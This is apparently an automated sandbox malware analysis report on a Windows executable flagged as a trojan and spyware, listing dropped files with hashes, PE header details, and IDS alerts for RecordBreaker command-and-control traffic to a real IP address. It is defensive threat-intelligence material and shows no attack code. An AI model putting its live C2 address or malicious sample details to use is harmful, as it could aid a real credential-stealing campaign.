                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • HDC enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Detection:MAL
                                      Classification:mal60.troj.spyw.evad.winEXE@7/13@0/1
                                      EGA Information:
                                      • Successful, ratio: 66.7%
                                      HDC Information:
                                      • Successful, ratio: 99.6% (good quality ratio 98.1%)
                                      • Quality average: 87.1%
                                      • Quality standard deviation: 21.8%
                                      HCA Information:
                                      • Successful, ratio: 61%
                                      • Number of executed functions: 0
                                      • Number of non-executed functions: 0
                                      Cookbook Comments:
                                      • Found application associated with file extension: .exe
                                      • Adjust boot time
                                      • Enable AMSI
                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                      • TCP Packets have been reduced to 100
                                      • Excluded IPs from analysis (whitelisted): 23.211.6.115
                                      • Excluded domains from analysis (whitelisted): www.bing.com, e12564.dspb.akamaiedge.net, fs.microsoft.com, login.live.com, store-images.s-microsoft.com, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
• Execution Graph export aborted for target 2.0.0-beta2.cps.exe, PID 2332 because there are no executed functions
• Not all processes were analyzed; the report is missing behavior information
                                      • Report creation exceeded maximum time and may have missing disassembly code information.
                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                      No simulations
                                      No context
                                      Process:C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe
                                      File Type:SQLite 3.x database, last written using SQLite version 3032001
                                      Category:dropped
                                      Size (bytes):40960
                                      Entropy (8bit):0.792852251086831
                                      Encrypted:false
                                      SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                      MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                      SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                      SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                      SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                      Malicious:false
                                      Reputation:high, very likely benign file
                                      Preview:SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                      Process:C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):684984
                                      Entropy (8bit):6.857030838615762
                                      Encrypted:false
                                      SSDEEP:12288:0oUg2twzqWC4kBNv1pMByWk6TYnhCevOEH07OqHM65BaFBuY3NUNeCLIV/Rqnhab:0oUg2tJWC44WUuY3mMCLA/R+hw
                                      MD5:15B61E4A910C172B25FB7D8CCB92F754
                                      SHA1:5D9E319C7D47EB6D31AAED27707FE27A1665031C
                                      SHA-256:B2AE93D30C8BEB0B26F03D4A8325AC89B92A299E8F853E5CAA51BB32575B06C6
                                      SHA-512:7C1C982A2B597B665F45024A42E343A0A07A6167F77EE428A203F23BE94B5F225E22A270D1A41B655F3173369F27991770722D765774627229B6B1BBE2A6DC3F
                                      Malicious:false
                                      Antivirus:
                                      • Antivirus: Virustotal, Detection: 0%, Browse
                                      • Antivirus: Metadefender, Detection: 0%, Browse
                                      • Antivirus: ReversingLabs, Detection: 0%
                                      Reputation:moderate, very likely benign file
                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...&.9b.........."!.........6...........................................................@A........................4,..S....,..........x............T..........8$...&...............................0..................D............................text............................... ..`.rdata.......0......................@..@.data...<F...@.......&..............@....00cfg...............(..............@..@.rsrc...x............*..............@..@.reloc..8$.......&..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                      Process:C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):627128
                                      Entropy (8bit):6.792651884784197
                                      Encrypted:false
                                      SSDEEP:12288:dfsiG5KNZea77VUHQqROmbIDm0ICRfCtbtEE/2OH9E2ARlZYSd:df53NZea3V+QqROmum0nRKx79E2ARlrd
                                      MD5:F07D9977430E762B563EAADC2B94BBFA
                                      SHA1:DA0A05B2B8D269FB73558DFCF0ED5C167F6D3877
                                      SHA-256:4191FAF7E5EB105A0F4C5C6ED3E9E9C71014E8AA39BBEE313BC92D1411E9E862
                                      SHA-512:6AFD512E4099643BBA3FC7700DD72744156B78B7BDA10263BA1F8571D1E282133A433215A9222A7799F9824F244A2BC80C2816A62DE1497017A4B26D562B7EAF
                                      Malicious:false
                                      Antivirus:
                                      • Antivirus: Virustotal, Detection: 0%, Browse
                                      • Antivirus: Metadefender, Detection: 0%, Browse
                                      • Antivirus: ReversingLabs, Detection: 0%
                                      Reputation:moderate, very likely benign file
                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....9b.........."!.........V......./....................................................@A............................cQ......,....p...............r..........4C...........................W......h0...............................................text............................... ..`.rdata.......0......................@..@.data........0......................@....00cfg.......P....... ..............@..@.tls.........`......."..............@....rsrc........p.......$..............@..@.reloc..4C.......D..................@..B................................................................................................................................................................................................................................................................................................................................................................
                                      Process:C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe
                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):449280
                                      Entropy (8bit):6.670243582402913
                                      Encrypted:false
                                      SSDEEP:12288:UEPa9C9VbL+3Omy5CvyOvzeOKaqhUgiW6QR7t5s03Ooc8dHkC2esGgW8g:UEPa90Vbky5CvyUeOKg03Ooc8dHkC2ed
                                      MD5:1FB93933FD087215A3C7B0800E6BB703
                                      SHA1:A78232C352ED06CEDD7CA5CD5CB60E61EF8D86FB
                                      SHA-256:2DB7FD3C9C3C4B67F2D50A5A50E8C69154DC859780DD487C28A4E6ED1AF90D01
                                      SHA-512:79CD448E44B5607863B3CD0F9C8E1310F7E340559495589C428A24A4AC49BEB06502D787824097BB959A1C9CB80672630DAC19A405468A0B64DB5EBD6493590E
                                      Malicious:false
                                      Antivirus:
                                      • Antivirus: Virustotal, Detection: 0%, Browse
                                      • Antivirus: Metadefender, Detection: 0%, Browse
                                      • Antivirus: ReversingLabs, Detection: 0%
                                      Reputation:moderate, very likely benign file
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L....(.[.........."!.....(..........`........@............................................@A.........................g.......r...........................?.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................
                                      Process:C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):2042296
                                      Entropy (8bit):6.775178510549486
                                      Encrypted:false
                                      SSDEEP:49152:6dvFywfzFAF7fg39IwA49Kap9bGt+qoStYnOsbqbeQom7gN7BpDD5SkIN1g5D92+:pptximYfpx8OwNiVG09
                                      MD5:F67D08E8C02574CBC2F1122C53BFB976
                                      SHA1:6522992957E7E4D074947CAD63189F308A80FCF2
                                      SHA-256:C65B7AFB05EE2B2687E6280594019068C3D3829182DFE8604CE4ADF2116CC46E
                                      SHA-512:2E9D0A211D2B085514F181852FAE6E7CA6AED4D29F396348BEDB59C556E39621810A9A74671566A49E126EC73A60D0F781FA9085EB407DF1EEFD942C18853BE5
                                      Malicious:false
                                      Antivirus:
                                      • Antivirus: Virustotal, Detection: 0%, Browse
                                      • Antivirus: Metadefender, Detection: 0%, Browse
                                      • Antivirus: ReversingLabs, Detection: 0%
                                      Reputation:moderate, very likely benign file
                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....9b.........."!.........&...............................................`............@A.........................!..\...T...@....@..x....................P..h...h...................................................\....!..@....................text...i........................... ..`.rdata..............................@..@.data....N.......*..................@....00cfg.......0......................@..@.rsrc...x....@......................@..@.reloc..h....P......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                      Process:C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):254392
                                      Entropy (8bit):6.686038834818694
                                      Encrypted:false
                                      SSDEEP:6144:uI7A8DMhFE2PlKOcpHSvV6x/CHQyhvs277H0mhWGzTdtb2bbIFxW7zrM2ruyYz+h:uI7A8DMhFE2PlbcpSv0x/CJVUmhDzTvS
                                      MD5:63A1FE06BE877497C4C2017CA0303537
                                      SHA1:F4F9CBD7066AFB86877BB79C3D23EDDACA15F5A0
                                      SHA-256:44BE3153C15C2D18F49674A092C135D3482FB89B77A1B2063D01D02985555FE0
                                      SHA-512:0475EDC7DFBE8660E27D93B7B8B5162043F1F8052AB28C87E23A6DAF9A5CB93D0D7888B6E57504B1F2359B34C487D9F02D85A34A7F17C04188318BB8E89126BF
                                      Malicious:false
                                      Antivirus:
                                      • Antivirus: Virustotal, Detection: 0%, Browse
                                      • Antivirus: Metadefender, Detection: 0%, Browse
                                      • Antivirus: ReversingLabs, Detection: 0%
                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...'.9b.........."!......................................................................@A........................tv..S....w...................................5..hq..............................................D{...............................text...V........................... ..`.rdata..............................@..@.data................~..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                                      Process:C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe
                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):1099223
                                      Entropy (8bit):6.502588297211263
                                      Encrypted:false
                                      SSDEEP:24576:9jxwSkSteuT4P/y7HjsXAGJyGvN5z4Rui2IXLbO:9Vww8HyrjsvyWN54RZH+
                                      MD5:DBF4F8DCEFB8056DC6BAE4B67FF810CE
                                      SHA1:BBAC1DD8A07C6069415C04B62747D794736D0689
                                      SHA-256:47B64311719000FA8C432165A0FDCDFED735D5B54977B052DE915B1CBBBF9D68
                                      SHA-512:B572CA2F2E4A5CC93E4FCC7A18C0AE6DF888AA4C55BC7DA591E316927A4B5CFCBDDA6E60018950BE891FF3B26F470CC5CCE34D217C2D35074322AB84C32A25D1
                                      Malicious:false
                                      Antivirus:
                                      • Antivirus: Metadefender, Detection: 0%, Browse
                                      • Antivirus: ReversingLabs, Detection: 0%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...".,b.v.........!......................... .....a......................................... .........................n*................................... ...;...................................................................................text...............................`.P`.data...|'... ...(..................@.`..rdata...D...P...F...:..............@.`@.bss....(.............................`..edata..n*.......,..................@.0@.idata..............................@.0..CRT....,...........................@.0..tls.... ...........................@.0..rsrc...............................@.0..reloc...;... ...<..................@.0B/4......8....`......................@.@B/19.....R....p......................@..B/31.....]'...@...(..................@..B/45......-...p......................@..B/57.....\............&..............@.0B/70.....#............2..
                                      Process:C:\Users\user\AppData\Local\Temp\2.0.0-beta2.cps.exe
                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):80128
                                      Entropy (8bit):6.906674531653877
                                      Encrypted:false
                                      SSDEEP:1536:l9j/j2886xv555et/MCsjw0BuRK3jteopUecbAdz86B+JfBL+eNv:l9j/j28V55At/zqw+IqLUecbAdz8lJrv
                                      MD5:1B171F9A428C44ACF85F89989007C328
                                      SHA1:6F25A874D6CBF8158CB7C491DCEDAA81CEAEBBAE
                                      SHA-256:9D02E952396BDFF3ABFE5654E07B7A713C84268A225E11ED9A3BF338ED1E424C
                                      SHA-512:99A06770EEA07F36ABC4AE0CECB2AE13C3ACB362B38B731C3BAED045BF76EA6B61EFE4089CD2EFAC27701E9443388322365BDB039CD388987B24D4A43C973BD1
                                      Malicious:false
                                      Antivirus:
                                      • Antivirus: Metadefender, Detection: 0%, Browse
                                      • Antivirus: ReversingLabs, Detection: 0%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L....(.[.........."!.........................................................0......t(....@A.............................................................?... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................
                                      Process:C:\Users\user\Desktop\KbqArOlW06.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):859
                                      Entropy (8bit):5.373981576136143
                                      Encrypted:false
                                      SSDEEP:24:ML9E4KrgKDE4KGKN08AKha1qE4GiD0E4KeGj:MxHKEYHKGD8Aoa1qHGiD0HKeGj
                                      MD5:7B5289C8BE1CA53C52CC7E7D6CB25DC3
                                      SHA1:C10677CF351D7C5D6466BC37088DA5167DFA7673
                                      SHA-256:BC87EABFF428C355479C48BEA29DA6620274B680849BC5A09155B08C8B225F76
                                      SHA-512:1E18D202A2D0070E10BF8074D144091CD56C00EE0EC5D32DDAE1EDAD744647DB28BE45528EE8F910A6E1572B482A95B079468BCDA1D19AE566EDA09B8F16055B
                                      Malicious:true
                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\4e05e2e48b8a6dd267a8c9e25ef129a7\System.Core.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\49e5c0579db170be9741dccc34c1998e\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\6d7d43e19d7fc0006285b85b7e2c8702\System.Windows.Forms.ni.dll",0..
                                      Process:C:\Users\user\Desktop\KbqArOlW06.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):762660256
                                      Entropy (8bit):0.16011324299122182
                                      Encrypted:false
                                      SSDEEP:
                                      MD5:881CBC2DA4C6467AEC519F4909371AF8
                                      SHA1:EC9C0F602456802254AC2659CD0B42EF97D32B62
                                      SHA-256:DCE4E4783AB5819869BAAE8B98812AABE7654BA2FF9D1E033548A52AF93E89A5
                                      SHA-512:E1D3221D3663E09B8258A4B3AD77A201E18A7CC880B359EDF1DD9A2123ED48C6B4888F27F7F9BAD9B2DA6328F5211FE709E94195E76288C9255997612415B098
                                      Malicious:true
                                      Process:C:\Users\user\Desktop\KbqArOlW06.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):593460
                                      Entropy (8bit):7.708842476672564
                                      Encrypted:false
                                      SSDEEP:12288:RyIF9+rdfN1UfMM+tkY/MniANaeicSS+LqBs/P6YwoAe5dWT:RyI3+rdF1sYrMiANaob+LqBs+feOT
                                      MD5:B184AD382E1729FEEA1E7BB94307930F
                                      SHA1:B46E64520E624EBD330534EF6DC7F931DD3C41B5
                                      SHA-256:D5B69C60652584A9FE19F3CCBEA534CE749DF0A86FA30484B0E1D9EFD8DD58C7
                                      SHA-512:1C08393818441B6304500B1178AEF344A337DF915A7987A294EB67503F0F95FA77B070EE366A7309DA069C4D88645DBBAEE6296F14C1F5CF32DB54C4CA047483
                                      Malicious:true
                                      Process:C:\Users\user\AppData\Local\Temp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):772608
                                      Entropy (8bit):6.365859318194335
                                      Encrypted:false
                                      SSDEEP:12288:PqIRz+f+ui8TrPO37fzH4A63RRwDFtuXUZERmhrNh4dT9TaC+IGNbDtQPupXyx95:SIZg+uiirPO37fzH4A6haDbcUZEbdT9z
                                      MD5:D8467CA1F529C6C6DECB1B82DBAED1DF
                                      SHA1:A4A21C366A4F4331E13BADA80682A117C9D17BE2
                                      SHA-256:D12E8487B5941B9552E2AD2F742938CFF407CB80825AD4DBB1B54DE2C706CE81
                                      SHA-512:03A519849743A7F71AE2974B4D5D08CEBA8555F06FF8C64A4A99749BBEF99D59F40EFFC34F3F8AFBB56D8370C1171A5F5BA5DE4D0CA830BFB28B16C5E6956257
                                      Malicious:true
                                      Process:C:\Users\user\AppData\Local\Temp\is-K5196.tmp\A1Photo-&-Art-Enhancer_Search&Patch_Activation.tmp
                                      File Type:PE32+ executable (console) x86-64, for MS Windows
                                      Category:dropped
                                      Size (bytes):6144
                                      Entropy (8bit):4.720366600008286
                                      Encrypted:false
                                      SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12p+gt1sONA0:sfJEVYlvxaX12C6A0
                                      MD5:E4211D6D009757C078A9FAC7FF4F03D4
                                      SHA1:019CD56BA687D39D12D4B13991C9A42EA6BA03DA
                                      SHA-256:388A796580234EFC95F3B1C70AD4CB44BFDDC7BA0F9203BF4902B9929B136F95
                                      SHA-512:17257F15D843E88BB78ADCFB48184B8CE22109CC2C99E709432728A392AFAE7B808ED32289BA397207172DE990A354F15C2459B6797317DA8EA18B040C85787E
                                      Malicious:false
                                      File type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                                      Entropy (8bit):6.219776880669485
                                      TrID:
                                      • Win64 Executable GUI Net Framework (217006/5) 49.88%
                                      • Win64 Executable GUI (202006/5) 46.43%
                                      • Win64 Executable (generic) (12005/4) 2.76%
                                      • Generic Win/DOS Executable (2004/3) 0.46%
                                      • DOS Executable Generic (2002/1) 0.46%
                                      File name:KbqArOlW06.exe
                                      File size:12978176
                                      MD5:005297e7c0d555822b5a6f31fcdc7661
                                      SHA1:9d5f9d90a1574c333ec68dbc800cb70397a1826d
                                      SHA256:6b8dac8326076b76369a8eb4e316a86a7663b597aeffe89b35e86c02aa5df4c0
                                      SHA512:0b274948a9a660483d8a64170c39aeee37a8a134fc926a1adc7d9884687cfd5ef9b8c32791ad74d81454778e6ace037454b012b769eeb8367d524fc7a51b663d
                                      SSDEEP:98304:QxQiz9Gm4H4Ul8zl6CH1OzkcC2IBev7CEObzWxtef1lKhx0vBaU6/yYsXd3VrJSp:QQszlVVOu2I8vJObShhyvBaUeY3+
                                      TLSH:9ED633E12F8CCA29F3A5C639A159867982BB9E19F256780DE6F07C0D1F2579371213CC
                                      Icon Hash:99da7233a0e2c9c9
                                      Entrypoint:0x140000000
                                      Entrypoint Section:
                                      Digitally signed:false
                                      Imagebase:0x140000000
                                      Subsystem:windows gui
                                      Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                      Time Stamp:0x62E83593 [Mon Aug 1 20:20:35 2022 UTC]
                                      TLS Callbacks:
                                      CLR (.Net) Version:v4.0.30319
                                      OS Version Major:4
                                      OS Version Minor:0
                                      File Version Major:4
                                      File Version Minor:0
                                      Subsystem Version Major:4
                                      Subsystem Version Minor:0
                                      Import Hash:
                                      Instruction
                                      dec ebp
                                      pop edx
                                      nop
                                      add byte ptr [ebx], al
                                      add byte ptr [eax], al
                                      add byte ptr [eax+eax], al
                                      add byte ptr [eax], al
                                       Name | Virtual Address | Virtual Size | Is in Section
                                       IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                       IMAGE_DIRECTORY_ENTRY_IMPORT | 0x0 | 0x0 |
                                       IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc54000 | 0xe9d0 | .rsrc
                                       IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                       IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                       IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
                                       IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                       IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                       IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                       IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                       IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                       IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                       IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
                                       IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                       IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2000 | 0x48 | .text
                                       IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                       Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                       .text | 0x2000 | 0xc51ad8 | 0xc51c00 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                       .rsrc | 0xc54000 | 0xe9d0 | 0xea00 | False | 0.24090211004273504 | data | 3.4100373155600514 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                       Name | RVA | Size | Type | Language | Country
                                       RT_ICON | 0xc54518 | 0xe1dc | dBase III DBT, version number 0, next free block index 40 | |
                                       RT_GROUP_ICON | 0xc626f8 | 0x14 | data | |
                                       RT_VERSION | 0xc54130 | 0x3e4 | data | |
                                       RT_MANIFEST | 0xc62710 | 0x2bd | XML 1.0 document, ASCII text, with CRLF line terminators | |
                                       Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                                       08/05/22-13:54:12.723337 | TCP | 2036934 | ET TROJAN Win32/RecordBreaker CnC Checkin | 49778 | 80 | 192.168.2.4 | 51.195.166.178
                                       08/05/22-13:54:12.825297 | TCP | 2036955 | ET TROJAN Win32/RecordBreaker CnC Checkin - Server Response | 80 | 49778 | 51.195.166.178 | 192.168.2.4
                                       Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                       Aug 5, 2022 13:54:12.681298971 CEST | 49778 | 80 | 192.168.2.4 | 51.195.166.178
                                       Aug 5, 2022 13:54:12.710944891 CEST | 80 | 49778 | 51.195.166.178 | 192.168.2.4
                                       Aug 5, 2022 13:54:12.712569952 CEST | 49778 | 80 | 192.168.2.4 | 51.195.166.178
                                       Aug 5, 2022 13:54:12.723336935 CEST | 49778 | 80 | 192.168.2.4 | 51.195.166.178
                                       Aug 5, 2022 13:54:12.752590895 CEST | 80 | 49778 | 51.195.166.178 | 192.168.2.4
                                       Aug 5, 2022 13:54:12.825297117 CEST | 80 | 49778 | 51.195.166.178 | 192.168.2.4
                                       Aug 5, 2022 13:54:12.825330973 CEST | 80 | 49778 | 51.195.166.178 | 192.168.2.4
                                       Aug 5, 2022 13:54:12.825359106 CEST | 80 | 49778 | 51.195.166.178 | 192.168.2.4
                                       Aug 5, 2022 13:54:12.825387001 CEST | 80 | 49778 | 51.195.166.178 | 192.168.2.4
                                       Aug 5, 2022 13:54:12.825391054 CEST | 49778 | 80 | 192.168.2.4 | 51.195.166.178
                                       Aug 5, 2022 13:54:12.825413942 CEST | 80 | 49778 | 51.195.166.178 | 192.168.2.4
                                       Aug 5, 2022 13:54:12.825423002 CEST | 49778 | 80 | 192.168.2.4 | 51.195.166.178
                                       Aug 5, 2022 13:54:12.825448990 CEST | 49778 | 80 | 192.168.2.4 | 51.195.166.178
                                       Aug 5, 2022 13:54:13.039436102 CEST | 49778 | 80 | 192.168.2.4 | 51.195.166.178
                                       Aug 5, 2022 13:54:13.068814039 CEST | 80 | 49778 | 51.195.166.178 | 192.168.2.4
                                       Aug 5, 2022 13:54:13.091945887 CEST | 80 | 49778 | 51.195.166.178 | 192.168.2.4
                                       Aug 5, 2022 13:54:13.091986895 CEST | 80 | 49778 | 51.195.166.178 | 192.168.2.4
                                       Aug 5, 2022 13:54:13.092000008 CEST | 80 | 49778 | 51.195.166.178 | 192.168.2.4
                                       Aug 5, 2022 13:54:13.092009068 CEST | 80 | 49778 | 51.195.166.178 | 192.168.2.4
                                       Aug 5, 2022 13:54:13.092021942 CEST | 80 | 49778 | 51.195.166.178 | 192.168.2.4
                                       Aug 5, 2022 13:54:13.092031956 CEST | 80 | 49778 | 51.195.166.178 | 192.168.2.4
                                       Aug 5, 2022 13:54:13.092041969 CEST | 80 | 49778 | 51.195.166.178 | 192.168.2.4
                                       Aug 5, 2022 13:54:13.092044115 CEST | 49778 | 80 | 192.168.2.4 | 51.195.166.178
                                       Aug 5, 2022 13:54:13.092051983 CEST | 80 | 49778 | 51.195.166.178 | 192.168.2.4
                                       Aug 5, 2022 13:54:13.092063904 CEST | 80 | 49778 | 51.195.166.178 | 192.168.2.4
                                       Aug 5, 2022 13:54:13.092076063 CEST | 80 | 49778 | 51.195.166.178 | 192.168.2.4
                                       Aug 5, 2022 13:54:13.092103958 CEST | 49778 | 80 | 192.168.2.4 | 51.195.166.178
                                       Aug 5, 2022 13:54:13.092124939 CEST | 49778 | 80 | 192.168.2.4 | 51.195.166.178
                                       Aug 5, 2022 13:54:13.121283054 CEST | 80 | 49778 | 51.195.166.178 | 192.168.2.4
                                       Aug 5, 2022 13:54:13.121335030 CEST | 80 | 49778 | 51.195.166.178 | 192.168.2.4
                                       Aug 5, 2022 13:54:13.121380091 CEST | 80 | 49778 | 51.195.166.178 | 192.168.2.4
                                       Aug 5, 2022 13:54:13.121418953 CEST | 80 | 49778 | 51.195.166.178 | 192.168.2.4
                                       Aug 5, 2022 13:54:13.121447086 CEST | 80 | 49778 | 51.195.166.178 | 192.168.2.4
                                       Aug 5, 2022 13:54:13.121448040 CEST | 49778 | 80 | 192.168.2.4 | 51.195.166.178
                                       Aug 5, 2022 13:54:13.121473074 CEST | 80 | 49778 | 51.195.166.178 | 192.168.2.4
                                       Aug 5, 2022 13:54:13.121489048 CEST | 49778 | 80 | 192.168.2.4 | 51.195.166.178
                                       Aug 5, 2022 13:54:13.121500969 CEST | 80 | 49778 | 51.195.166.178 | 192.168.2.4
                                       Aug 5, 2022 13:54:13.121510983 CEST | 49778 | 80 | 192.168.2.4 | 51.195.166.178
                                       Aug 5, 2022 13:54:13.121527910 CEST | 80 | 49778 | 51.195.166.178 | 192.168.2.4
                                       Aug 5, 2022 13:54:13.121550083 CEST | 49778 | 80 | 192.168.2.4 | 51.195.166.178
                                       Aug 5, 2022 13:54:13.121555090 CEST | 80 | 49778 | 51.195.166.178 | 192.168.2.4
                                       Aug 5, 2022 13:54:13.121572971 CEST | 49778 | 80 | 192.168.2.4 | 51.195.166.178
                                       Aug 5, 2022 13:54:13.121582031 CEST | 80 | 49778 | 51.195.166.178 | 192.168.2.4
                                       Aug 5, 2022 13:54:13.121594906 CEST | 49778 | 80 | 192.168.2.4 | 51.195.166.178
                                       Aug 5, 2022 13:54:13.121608019 CEST | 80 | 49778 | 51.195.166.178 | 192.168.2.4
                                       Aug 5, 2022 13:54:13.121622086 CEST | 49778 | 80 | 192.168.2.4 | 51.195.166.178
                                       Aug 5, 2022 13:54:13.121634960 CEST | 80 | 49778 | 51.195.166.178 | 192.168.2.4
                                       Aug 5, 2022 13:54:13.121645927 CEST | 49778 | 80 | 192.168.2.4 | 51.195.166.178
                                       Aug 5, 2022 13:54:13.121661901 CEST | 80 | 49778 | 51.195.166.178 | 192.168.2.4
                                       Aug 5, 2022 13:54:13.121670961 CEST | 49778 | 80 | 192.168.2.4 | 51.195.166.178
                                       Aug 5, 2022 13:54:13.121686935 CEST | 80 | 49778 | 51.195.166.178 | 192.168.2.4
                                       Aug 5, 2022 13:54:13.121712923 CEST | 80 | 49778 | 51.195.166.178 | 192.168.2.4
                                       Aug 5, 2022 13:54:13.121741056 CEST | 80 | 49778 | 51.195.166.178 | 192.168.2.4
                                       Aug 5, 2022 13:54:13.121757030 CEST | 49778 | 80 | 192.168.2.4 | 51.195.166.178
                                       Aug 5, 2022 13:54:13.121767998 CEST | 80 | 49778 | 51.195.166.178 | 192.168.2.4
                                       Aug 5, 2022 13:54:13.121793032 CEST | 49778 | 80 | 192.168.2.4 | 51.195.166.178
                                       Aug 5, 2022 13:54:13.121793985 CEST | 80 | 49778 | 51.195.166.178 | 192.168.2.4
                                       Aug 5, 2022 13:54:13.121819973 CEST | 80 | 49778 | 51.195.166.178 | 192.168.2.4
                                       Aug 5, 2022 13:54:13.121829033 CEST | 49778 | 80 | 192.168.2.4 | 51.195.166.178
